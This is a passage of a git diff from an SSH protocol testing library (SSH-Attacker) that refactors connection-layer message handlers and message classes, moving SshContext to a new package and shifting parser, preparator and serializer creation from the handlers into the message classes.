b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/ChannelWindowAdjustMessageHandler.java @@ -7,13 +7,10 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.Channel; import de.rub.nds.sshattacker.core.protocol.connection.message.ChannelWindowAdjustMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelWindowAdjustMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelWindowAdjustMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelWindowAdjustMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class ChannelWindowAdjustMessageHandler extends SshMessageHandler { @@ -22,13 +19,13 @@ public ChannelWindowAdjustMessageHandler(SshContext context) { super(context); } - public ChannelWindowAdjustMessageHandler( + /*public ChannelWindowAdjustMessageHandler( SshContext context, ChannelWindowAdjustMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(ChannelWindowAdjustMessage message) { Channel channel = context.getChannels().get(message.getRecipientChannelId().getValue()); if (channel != null) { if (!channel.isOpen().getValue()) { @@ -49,7 +46,7 @@ public void adjustContext() { } } - @Override + /*@Override public ChannelWindowAdjustMessageParser getParser(byte[] array) { return new ChannelWindowAdjustMessageParser(array); } @@ -67,5 +64,5 @@ public ChannelWindowAdjustMessagePreparator getPreparator() { @Override public ChannelWindowAdjustMessageSerializer getSerializer() { return new ChannelWindowAdjustMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestCancelTcpIpForwardMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestCancelTcpIpForwardMessageHandler.java index 68c53f8cd..38396b12f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestCancelTcpIpForwardMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestCancelTcpIpForwardMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestCancelTcpIpForwardMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestCancelTcpIpForwardMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestCancelTcpIpForwardlMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestCancelTcpIpForwardlMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestCancelTcpIpForwardMessageHandler extends SshMessageHandler { @@ -21,15 +18,15 @@ public GlobalRequestCancelTcpIpForwardMessageHandler(SshContext context) { super(context); } - public GlobalRequestCancelTcpIpForwardMessageHandler( + /*public GlobalRequestCancelTcpIpForwardMessageHandler( SshContext context, GlobalRequestCancelTcpIpForwardMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(GlobalRequestCancelTcpIpForwardMessage message) {} - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new GlobalRequestCancelTcpIpForwardMessageParser(array); } @@ -48,5 +45,5 @@ public SshMessagePreparator getPreparato @Override public SshMessageSerializer getSerializer() { return new GlobalRequestCancelTcpIpForwardlMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestFailureMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestFailureMessageHandler.java index a22076fc2..de3d8fe74 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestFailureMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestFailureMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestFailureMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestFailureMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestFailureMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestFailureMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestFailureMessageHandler extends SshMessageHandler { @@ -21,17 +18,17 @@ public GlobalRequestFailureMessageHandler(SshContext context) { super(context); } - public GlobalRequestFailureMessageHandler( + /*public GlobalRequestFailureMessageHandler( SshContext context, GlobalRequestFailureMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(GlobalRequestFailureMessage message) { // TODO: Handle RequestFailureMessage } - @Override + /*@Override public GlobalRequestFailureMessageParser getParser(byte[] array) { return new GlobalRequestFailureMessageParser(array); } @@ -49,5 +46,5 @@ public GlobalRequestFailureMessagePreparator getPreparator() { @Override public GlobalRequestFailureMessageSerializer getSerializer() { return new GlobalRequestFailureMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestNoMoreSessionsMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestNoMoreSessionsMessageHandler.java index aa9cdc229..66f10440c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestNoMoreSessionsMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestNoMoreSessionsMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestNoMoreSessionsMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestNoMoreSessionsMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestNoMoreSessionsMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestNoMoreSessionsMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestNoMoreSessionsMessageHandler extends SshMessageHandler { @@ -21,15 +18,15 @@ public GlobalRequestNoMoreSessionsMessageHandler(SshContext context) { super(context); } - public GlobalRequestNoMoreSessionsMessageHandler( + /*public GlobalRequestNoMoreSessionsMessageHandler( SshContext context, GlobalRequestNoMoreSessionsMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(GlobalRequestNoMoreSessionsMessage message) {} - @Override + /*@Override public GlobalRequestNoMoreSessionsMessageParser getParser(byte[] array) { return new GlobalRequestNoMoreSessionsMessageParser(array); } @@ -47,5 +44,5 @@ public GlobalRequestNoMoreSessionsMessagePreparator getPreparator() { @Override public GlobalRequestNoMoreSessionsMessageSerializer getSerializer() { return new GlobalRequestNoMoreSessionsMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestOpenSshHostKeysMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestOpenSshHostKeysMessageHandler.java index 3b4179852..ebe142317 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestOpenSshHostKeysMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestOpenSshHostKeysMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestOpenSshHostKeysMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestOpenSshHostKeysMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestOpenSshHostKeysMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestOpenSshHostKeysMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestOpenSshHostKeysMessageHandler extends SshMessageHandler { @@ -21,15 +18,15 @@ public GlobalRequestOpenSshHostKeysMessageHandler(SshContext context) { super(context); } - public GlobalRequestOpenSshHostKeysMessageHandler( + /*public GlobalRequestOpenSshHostKeysMessageHandler( SshContext context, GlobalRequestOpenSshHostKeysMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(GlobalRequestOpenSshHostKeysMessage message) {} - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new GlobalRequestOpenSshHostKeysMessageParser(array); } @@ -48,5 +45,5 @@ public SshMessagePreparator getPreparator() @Override public SshMessageSerializer getSerializer() { return new GlobalRequestOpenSshHostKeysMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestSuccessMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestSuccessMessageHandler.java index 02ed5f016..c197a61ff 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestSuccessMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestSuccessMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestSuccessMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestSuccessMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestSuccessMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestSuccessMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestSuccessMessageHandler extends SshMessageHandler { @@ -21,17 +18,17 @@ public GlobalRequestSuccessMessageHandler(SshContext context) { super(context); } - public GlobalRequestSuccessMessageHandler( + /*public GlobalRequestSuccessMessageHandler( SshContext context, GlobalRequestSuccessMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() { + public void adjustContext(GlobalRequestSuccessMessage message) { // TODO: Handle RequestSucessMessage } - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new GlobalRequestSuccessMessageParser(array); } @@ -50,5 +47,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new GlobalRequestSuccessMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestTcpIpForwardMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestTcpIpForwardMessageHandler.java index 44e030d53..bb0a7662f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestTcpIpForwardMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestTcpIpForwardMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.*; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestTcpIpForwardMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestTcpIpForwardMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestTcpIpForwardMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestTcpIpForwardMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestTcpIpForwardMessageHandler extends SshMessageHandler { @@ -21,15 +18,15 @@ public GlobalRequestTcpIpForwardMessageHandler(SshContext context) { super(context); } - public GlobalRequestTcpIpForwardMessageHandler( + /*public GlobalRequestTcpIpForwardMessageHandler( SshContext context, GlobalRequestTcpIpForwardMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(GlobalRequestTcpIpForwardMessage message) {} - @Override + /*@Override public SshMessageParser getParser(byte[] array) { return new GlobalRequestTcpIpForwardMessageParser(array); } @@ -48,5 +45,5 @@ public SshMessagePreparator getPreparator() { @Override public SshMessageSerializer getSerializer() { return new GlobalRequestTcpIpForwardMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestUnknownMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestUnknownMessageHandler.java index 182a56a1b..bb806803a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestUnknownMessageHandler.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/handler/GlobalRequestUnknownMessageHandler.java @@ -7,12 +7,9 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.handler; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.common.SshMessageHandler; import de.rub.nds.sshattacker.core.protocol.connection.message.GlobalRequestUnknownMessage; -import de.rub.nds.sshattacker.core.protocol.connection.parser.GlobalRequestUnknownMessageParser; -import de.rub.nds.sshattacker.core.protocol.connection.preparator.GlobalRequestUnknownMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.connection.serializer.GlobalRequestUnknownMessageSerializer; -import de.rub.nds.sshattacker.core.state.SshContext; public class GlobalRequestUnknownMessageHandler extends SshMessageHandler { @@ -21,15 +18,15 @@ public GlobalRequestUnknownMessageHandler(SshContext context) { super(context); } - public GlobalRequestUnknownMessageHandler( + /*public GlobalRequestUnknownMessageHandler( SshContext context, GlobalRequestUnknownMessage message) { super(context, message); - } + }*/ @Override - public void adjustContext() {} + public void adjustContext(GlobalRequestUnknownMessage message) {} - @Override + /*@Override public GlobalRequestUnknownMessageParser getParser(byte[] array) { return new GlobalRequestUnknownMessageParser(array); } @@ -47,5 +44,5 @@ public GlobalRequestUnknownMessagePreparator getPreparator() { @Override public GlobalRequestUnknownMessageSerializer getSerializer() { return new GlobalRequestUnknownMessageSerializer(message); - } + }*/ } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java index bd6eeeb75..a4bfbae62 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java @@ -7,13 +7,37 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelCloseMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelCloseMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelCloseMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; +import java.io.InputStream; public class ChannelCloseMessage extends ChannelMessage { @Override public ChannelCloseMessageHandler getHandler(SshContext context) { - return new ChannelCloseMessageHandler(context, this); + return new ChannelCloseMessageHandler(context); + } + + @Override + public ChannelCloseMessagePreparator getPreparator(SshContext sshContext) { + return new ChannelCloseMessagePreparator(sshContext.getChooser(), this); + } + + @Override + public ChannelMessageSerializer getSerializer(SshContext sshContext) { + return new ChannelMessageSerializer<>(this); + } + + @Override + public ChannelCloseMessageParser getParser(SshContext sshContext, InputStream stream) { + return new ChannelCloseMessageParser(stream); + } + + @Override + public String toShortString() { + return "CHAN_CLOSE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java index 38455bf91..4c348fd66 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java @@ -10,8 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelDataMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelDataMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelDataMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelDataMessageSerializer; +import java.io.InputStream; public class ChannelDataMessage extends ChannelMessage { @@ -58,6 +62,26 @@ public void setData(byte[] data, boolean adjustLengthField) { @Override public ChannelDataMessageHandler getHandler(SshContext context) { - return new ChannelDataMessageHandler(context, this); + return new ChannelDataMessageHandler(context); + } + + @Override + public ChannelDataMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelDataMessageParser(stream); + } + + @Override + public ChannelDataMessagePreparator getPreparator(SshContext context) { + return new ChannelDataMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelDataMessageSerializer getSerializer(SshContext context) { + return new ChannelDataMessageSerializer(this); + } + + @Override + public String toShortString() { + return "CHANDAT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java index 378a627af..be66fe9d2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java @@ -7,13 +7,37 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelEofMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelEofMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelEofMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; +import java.io.InputStream; public class ChannelEofMessage extends ChannelMessage { @Override public ChannelEofMessageHandler getHandler(SshContext context) { - return new ChannelEofMessageHandler(context, this); + return new ChannelEofMessageHandler(context); + } + + @Override + public ChannelEofMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelEofMessageParser(stream); + } + + @Override + public ChannelEofMessagePreparator getPreparator(SshContext context) { + return new ChannelEofMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelMessageSerializer getSerializer(SshContext context) { + return new ChannelMessageSerializer<>(this); + } + + @Override + public String toShortString() { + return "CHAN_EOF"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java index 2e544e667..f060c1f0c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java @@ -11,8 +11,12 @@ import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.sshattacker.core.constants.ExtendedChannelDataType; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelExtendedDataMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelExtendedDataMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelExtendedDataMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelExtendedDataMessageSerializer; +import java.io.InputStream; public class ChannelExtendedDataMessage extends ChannelMessage { @@ -77,6 +81,33 @@ public void setData(byte[] data, boolean adjustLengthField) { @Override public ChannelExtendedDataMessageHandler getHandler(SshContext context) { - return new ChannelExtendedDataMessageHandler(context, this); + return new ChannelExtendedDataMessageHandler(context); + } + + /* + @Override + public ChannelExtendedDataMessageParser getParser(byte[] array) { + return new ChannelExtendedDataMessageParser(array); + } + */ + + @Override + public ChannelExtendedDataMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelExtendedDataMessageParser(stream); + } + + @Override + public ChannelExtendedDataMessagePreparator getPreparator(SshContext context) { + return new ChannelExtendedDataMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelExtendedDataMessageSerializer getSerializer(SshContext context) { + return new ChannelExtendedDataMessageSerializer(this); + } + + @Override + public String toShortString() { + return "CHANEXTEND"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelFailureMessage.java index bc1bdac2c..d8ca58fe5 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelFailureMessage.java @@ -7,13 +7,37 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelFailureMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelFailureMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelFailureMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelMessageSerializer; +import java.io.InputStream; public class ChannelFailureMessage extends ChannelMessage { @Override public ChannelFailureMessageHandler getHandler(SshContext context) { - return new ChannelFailureMessageHandler(context, this); + return new ChannelFailureMessageHandler(context); + } + + @Override + public ChannelFailureMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelFailureMessageParser(stream); + } + + @Override + public ChannelFailureMessagePreparator getPreparator(SshContext context) { + return new ChannelFailureMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelMessageSerializer getSerializer(SshContext context) { + return new ChannelMessageSerializer<>(this); + } + + @Override + public String toShortString() { + return "CHAN_FAIL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java index 3b6141d17..54c26fe34 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java @@ -9,8 +9,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelOpenConfirmationMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenConfirmationMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenConfirmationMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenConfirmationMessageSerializer; +import java.io.InputStream; public class ChannelOpenConfirmationMessage extends ChannelMessage { @@ -57,6 +61,26 @@ public void setPacketSize(int packetSize) { @Override public ChannelOpenConfirmationMessageHandler getHandler(SshContext context) { - return new ChannelOpenConfirmationMessageHandler(context, this); + return new ChannelOpenConfirmationMessageHandler(context); + } + + @Override + public ChannelOpenConfirmationMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelOpenConfirmationMessageParser(stream); + } + + @Override + public ChannelOpenConfirmationMessagePreparator getPreparator(SshContext context) { + return new ChannelOpenConfirmationMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelOpenConfirmationMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenConfirmationMessageSerializer(this); + } + + @Override + public String toShortString() { + return "CHANNEL_OPEN"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java index c338d81e3..9162af364 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java @@ -10,8 +10,12 @@ import de.rub.nds.modifiablevariable.ModifiableVariableFactory; import de.rub.nds.modifiablevariable.integer.ModifiableInteger; import de.rub.nds.modifiablevariable.string.ModifiableString; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelOpenFailureMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenFailureMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenFailureMessagePreparator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenFailureMessageSerializer; +import java.io.InputStream; import java.nio.charset.StandardCharsets; public class ChannelOpenFailureMessage extends ChannelMessage { @@ -116,6 +120,26 @@ public void setLanguageTag(String languageTag, boolean adjustLengthField) { @Override public ChannelOpenFailureMessageHandler getHandler(SshContext context) { - return new ChannelOpenFailureMessageHandler(context, this); + return new ChannelOpenFailureMessageHandler(context); + } + + @Override + public ChannelOpenFailureMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelOpenFailureMessageParser(stream); + } + + @Override + public ChannelOpenFailureMessagePreparator getPreparator(SshContext context) { + return new ChannelOpenFailureMessagePreparator(context.getChooser(), this); + } + + @Override + public ChannelOpenFailureMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenFailureMessageSerializer(this); + } + + @Override + public String toShortString() { + return "OPENFAIL"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenSessionMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenSessionMessage.java index 42feed292..bc492e80b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenSessionMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenSessionMessage.java @@ -7,12 +7,36 @@ */ package de.rub.nds.sshattacker.core.protocol.connection.message; +import de.rub.nds.sshattacker.core.layer.context.SshContext; import de.rub.nds.sshattacker.core.protocol.connection.handler.ChannelOpenSessionMessageHandler; -import de.rub.nds.sshattacker.core.state.SshContext; +import de.rub.nds.sshattacker.core.protocol.connection.parser.ChannelOpenSessionMessageParser; +import de.rub.nds.sshattacker.core.protocol.connection.preparator.ChannelOpenSessionMessagePreperator; +import de.rub.nds.sshattacker.core.protocol.connection.serializer.ChannelOpenSessionMessageSerializer; +import java.io.InputStream; public class ChannelOpenSessionMessage extends ChannelOpenMessage { @Override public ChannelOpenSessionMessageHandler getHandler(SshContext context) { - return new ChannelOpenSessionMessageHandler(context, this); + return new ChannelOpenSessionMessageHandler(context); + } + + @Override + public ChannelOpenSessionMessageParser getParser(SshContext context, InputStream stream) { + return new ChannelOpenSessionMessageParser(stream); + } + + @Override + public ChannelOpenSessionMessagePreperator getPreparator(SshContext context) { + return new ChannelOpenSessionMessagePreperator(context.getChooser(), this); + } + + @Override + public ChannelOpenSessionMessageSerializer getSerializer(SshContext context) { + return new ChannelOpenSessionMessageSerializer(this); + } + + @Override + public String toShortString() { + return "OEPN_SESSION"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenUnknownMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenUnknownMessage.java index a64d4e4f8..7313368b2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenUnknownMessage.java 